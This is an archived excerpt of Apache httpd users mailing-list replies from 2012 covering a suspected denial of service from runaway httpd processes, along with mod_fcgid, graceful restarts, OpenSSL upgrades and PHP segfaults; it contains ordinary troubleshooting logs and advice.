 HTTP/1.1 200 58609 - Mozilla/5.0 (compatible; Googlebot/2.1;
 +http://www.google.com/bot.html)

No clue.  Maybe playing with open proxies?  The document seems to be 58k if 
that helps you
at all (maybe a local index page?)

 In the error log around that time I get nothing that looks suspicious
 
 [Tue May 22 09:31:54 2012] [error] [client 119.63.196.27] File does not exist:
 /usr/local/http/htdocs/robots.txt
 [Tue May 22 09:32:25 2012] [error] [client 86.68.18.171] File does not exist:
 /usr/local/http/htdocs/favicon.ico

Certainly harmless and most common from crawlers and web browsers respectively. 
 You may
want to add a simple one line robots.txt file, and a simple default icon.


 [Tue May 22 09:36:47 2012] [error] [client 89.144.206.157] File does not 
 exist:
 /usr/local/http/htdocs/thirdman/reichs/blank.gif, referer:
 http://axion.physics.ubc.ca/thirdman/reichs/reichsbruecke.htm

Your own mistake in the html, it seems.

Can you interrupt one of the truly hosed processes using gdb and try 'thread 
apply all bt'

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Denial of Service due to multiplication of httpd running

[William A. Rowe Jr.]

On 5/22/2012 6:00 PM, Bill Unruh wrote:
 On Tue, 22 May 2012, William A. Rowe Jr. wrote:
 
 On 5/22/2012 12:02 PM, Bill Unruh wrote:

 At that time in the access_log I have a whole bunch of entries like
 ::1 - - [22/May/2012:09:34:22 -0700] OPTIONS * HTTP/1.0 200 - - 
 Apache/2.2.22
 (Mandriva Linux/PREFORK-0.1mdv2010.2) (internal dummy connection)

 That's your own local loopback from a process running on this same box.
 
 There are no processes running on this same box. It is rarely used. and
 certainly did not have a browser running at that time.

Then a server module is likely pinging itself.  Any chance you set up an 
infinite proxy
recursion here?

 In the past I have also had connections like 66.249.68.198 - - 
 [22/May/2012:09:35:25
 -0700] GET
 /aggregator/www.umsl.edu/~keelr/010/www.twitter.com/www.iaea.org/Publications/Documents/Board/2008/www.environment-agency.gov.uk/homeandleisure/floods/node/www.guardian.co.uk/business/2012/feb/21/node/node/22?page=11

 HTTP/1.1 200 58609 - Mozilla/5.0 (compatible; Googlebot/2.1;
 +http://www.google.com/bot.html)

 No clue.  Maybe playing with open proxies?  The document seems to be 58k if 
 that helps you
 at all (maybe a local index page?)
 
 There is no such file or path on my system. If I try to use it, I get file not
 found. I have nothing called /aggregator/

Looking more and more like a proxy recursion/infinite looping sort of config 
error.

 Can you interrupt one of the truly hosed processes using gdb and try 'thread 
 apply all bt'
 
 What does that do?

Dumps all threads instead of just one of them.

 Thread 1 (Thread 0xb760f700 (LWP 20861)):
 #0  0xe424 in __kernel_vsyscall ()
 #1  0xb77ece6b in fcntl () from /lib/i686/libpthread.so.0
 #2  0xb780f832 in ?? () from /usr/lib/libapr-1.so.0
 #3  0xb780f1ad in apr_proc_mutex_lock () from /usr/lib/libapr-1.so.0
 #4  0x0809294c in ?? ()
 #5  0x08092e0b in ?? ()
 #6  0x08093be4 in ap_mpm_run ()
 #7  0x08064cd1 in main ()

It might be helpful to first install the debuginfo for the apr/httpd packages, 
but this
looks like it might be in the accept queue waiting on the MutexFile to unblock 
this one
(and is probably a healthy process).

If you are running prefork we would encourage you to try the worker mpm.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] mod_fcgid + daemon implemented in C

[William A. Rowe Jr.]

On 5/9/2012 8:41 AM, Henrik Strand wrote:
 
 I want to use mod_fcgid (http://httpd.apache.org/mod_fcgid/) with a
 daemon implemented in C. Is there a lib available like the one from the
 FastCGI project (http://www.fastcgi.com/) to use for a fcgi_accept()
 function? Or do I have to implement one myself?

If you want to manage the pool of fcgi workers yourself, please take a moment to
look at mod_proxy_fcgi as a possible solution for processing the requests in 
lieu
of mod_fcgid. The former only streams requests/responses, while the later also
handles all of the process pool management.  [And if we were clever and had time
on our hands, we would jettison the request pipeline from mod_fcgid in favor of
delegating that work to mod_proxy_fcgi ;-]

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] How to differentiate between Graceful restart and stop in apache extended module

[William A. Rowe Jr.]

On 5/7/2012 6:37 AM, vk.indushekar VK wrote:
 Hi,
 We developed a apache module mod_xx.so. We have a requirement where in we
 need to differentiate between apache graceful restart and normal stop. We
 need to execute certain part of the code for graceful restart only.
 
 So how do we differentiate between graceful restart and normal stop in
 apache extended modules.

Such questions about internal program state and c code are better addressed
to the modules-...@httpd.apache.org peer module hacking and development list.


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Upgrading OpenSSL without upgrading Apache. Can it be done???

[William A. Rowe Jr.]

On 4/24/2012 3:09 PM, TFML wrote:
 I'm assuming you're using some sort of Windows operating system.  I haven't 
 done one in a
 few years, but I would assume the 1.0 version
 from http://slproweb.com/products/Win32OpenSSL.html should work like 
 installing any other
 Windows Installer.  If someone else can't answer this, I'd suggest setting up 
 a virtual
 environment and giving it a try before doing it on a production system.

Just as on unix, you can never drop in a x.y.n change with a new x value.
That's called a major bump and usually does not work.

OP could obtain a 0.9.8X flavor later than 0.9.8t and aught to be fine so long
as no special build options were changed, and it was built to run against
msvcrt.dll (the *system* c library).  It's the same quandry as on Ubuntu with
glibc vs eglibc packages.

If OP reviewed the patch release notes, they would be aware that an upgrade
is unnecessary between 0.9.8t and 0.9.8w for anyone running httpd 2.2.  The
new features in httpd 2.4 were vulnerable to issues there, however.





-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Upgrading OpenSSL without upgrading Apache. Can it be done???

[William A. Rowe Jr.]

On 4/24/2012 4:05 PM, bfinkel...@aaamissouri.com wrote:
 
 Great thanks for the info!
 
 Where can I find out when apache.org will be bundling the latest version of 
 OpenSSL with
 apache?  PCI compliance calls for using level u as of today.

If you had read the notices from the OpenSSL project you would be aware
that the particular flaws in openssl 0.9.8 .u, .v and .w do not pertain
to the operation or deployment of httpd 2.2.x.  They do apply to the
operation of httpd 2.4, and adminstrators of 2.4 should upgrade ASAP.
(And if you were running 2.3-beta, upgrading httpd to 2.4 would be a very
wise move as well for httpd security flaws).

AFAIK only the windows binary 'bundles' openssl.  As that binary is not
affected it will not be updated, certainly not unless an httpd 2.2.23 is
released.

The ASF provides binaries only as a convenience and at our leisure; if
you are professionally responsible for an installation of httpd, openssl
and so forth which you refuse to compile yourself, you would probably
benefit from contracting for the services you are demanding.  The ASF
is here to collaboratively produce source code.


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] PHP doesn't process pages

[William A. Rowe Jr.]

On 4/22/2012 6:08 AM, Noel Butler wrote:
 John,
 
 On Sun, 2012-04-22 at 17:34 +1000, Noel Butler wrote:
 

 I note your using php 5.4.0 - all my testing has been with 5.3.10 and is 
 done on
 Slackware, but I do have one RHEL 5.2
 I'll throw 5.4 on the dev box if I get a chance later (almost dinner time 
 here) and see
 what blows up :)

 [Sun Apr 22 20:59:26.195710 2012] [core:notice] [pid 10108:tid 3068159760] 
 AH00052: child
 pid 10200 exit signal Segmentation fault (11)
 [Sun Apr 22 21:00:07.236804 2012] [core:notice] [pid 10108:tid 3068159760] 
 AH00052: child
 pid 10111 exit signal Segmentation fault (11)
 [Sun Apr 22 21:00:58.287673 2012] [core:notice] [pid 10108:tid 3068159760] 
 AH00052: child
 pid 10308 exit signal Segmentation fault (11)
 [Sun Apr 22 21:01:57.346649 2012] [core:notice] [pid 10108:tid 3068159760] 
 AH00052: child
 pid 10112 exit signal Segmentation fault (11)
 
 
 Confirmed bug 2.4.2  w/php 5.4.0: I suggest you log a bug report with php 
 development team

Please don't do that to other dev teams either.  Before you refer users, make 
sure
they know how to give something helpful to the OGP, the corresponding backtrace.
It radically improves the odds of their bug report being reviewed and acted on.

http://httpd.apache.org/dev/debugging.html



-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org